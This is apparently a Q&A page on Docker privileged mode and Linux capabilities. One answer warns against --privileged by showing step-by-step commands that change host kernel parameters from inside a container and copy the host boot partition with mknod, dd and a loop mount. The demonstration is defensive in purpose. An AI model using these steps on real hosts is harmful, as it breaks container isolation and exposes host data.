If I am running a container in privileged mode, does it have all the Kernel capabilities or do I need to add them separately?
We have run the 'fdisk –l' command to check that the container is running under privilege mode. Notes: Any command that requires privilege flag to be successful can be used to test the privilege mode inside the container.
What is Docker Privileged Mode? Docker privileged mode grants a Docker container root capabilities to all devices on the host system. Running a container in privileged mode gives it the capabilities of its host machine. For example, it enables it to modify App Arm and SELinux configurations.
By default, Docker containers are unprivileged. For example, in the default case, you cannot run a Docker daemon inside a Docker container. To give you control over a container's capabilities, Docker supports cap-add and cap-drop . For more details, see Runtime privilege and Linux capabilities.
When you run with the --privileged flag, SELinux labels are disabled, and the container runs with the label that the container engine was executed with. This label is usually unconfined and has full access to the labels that the container engine does.
Running in privileged mode indeed gives the container all capabilities. But it is good practice to always give a container the minimum requirements it needs.
The Docker run command documentation refers to this flag:
Full container capabilities (--privileged)
The --privileged flag gives all capabilities to the container, and it also lifts all the limitations enforced by the device cgroup controller. In other words, the container can then do almost everything that the host can do. This flag exists to allow special use-cases, like running Docker within Docker.
You can give specific capabilities using --cap-add
flag. See man 7 capabilities
for more info on those capabilities. The literal names can be used, e.g. --cap-add CAP_FOWNER
.
You never want to run a container using --privileged
.
I am doing this on my laptop which has NVMe drives, but it will work for any host:
docker run --privileged -t -i --rm ubuntu:latest bash
First lets do something minor, to test the /proc file system
From the container:
root@507aeb767c7e:/# cat /proc/sys/vm/swappiness
60
root@507aeb767c7e:/# echo "61" > /proc/sys/vm/swappiness
root@507aeb767c7e:/# cat /proc/sys/vm/swappiness
60
OK, did it change it for the container or for the host?
$ cat /proc/sys/vm/swappiness
61
OOPS! We can arbitrarily change the hosts kernel parameters. But this is just a DOS situation, lets see if we can collect privileged information from the parent host.
Lets walk the /sys
tree and find the major minor number for the boot disk.
Note: I have two NVMe drives and containers are running under LVM on another drive
root@507aeb767c7e:/proc# cat /sys/block/nvme1n1/dev
259:2
OK, let's make a device file in a location where the dbus rules won't auto scan:
root@507aeb767c7e:/proc# mknod /devnvme1n1 b 259 2
root@507aeb767c7e:/proc# sfdisk -d /devnvme1n1
label: gpt
label-id: 1BE1DF1D-3523-4F22-B22A-29FEF19F019E
device: /devnvme1n1
unit: sectors
first-lba: 34
last-lba: 2000409230
<SNIP>
OK, we can read the bootdisk, lets make a device file for one of the partitions. While we can't mount it as it will be open we can still use dd
to copy it.
root@507aeb767c7e:/proc# mknod /devnvme1n1p1 b 259 3
root@507aeb767c7e:/# dd if=devnvme1n1p1 of=foo.img
532480+0 records in
532480+0 records out
272629760 bytes (273 MB, 260 MiB) copied, 0.74277 s, 367 MB/s
OK, lets mount it and see if our efforts worked!!!
root@507aeb767c7e:/# mount -o loop foo.img /foo
root@507aeb767c7e:/# ls foo
EFI
root@507aeb767c7e:/# ls foo/EFI/
Boot Microsoft ubuntu
So basically any container host that you allow anyone to launch a --privileged
container on is the same as giving them root access to every container on that host.
Unfortunately the Docker project has chosen the trusted computing model, and outside of auth plugins there is no way to protect against this, so always err on the side of adding needed features vs. using --privileged
.
There is a good article from RedHat covering this.
While docker container running as "root" has less privileges than root on host, it still may need hardening depending on your use case (using as your development environment vs shared production cluster).
If you love us? You can donate to us via Paypal or buy me a coffee so we can maintain and grow! Thank you!
Donate Us With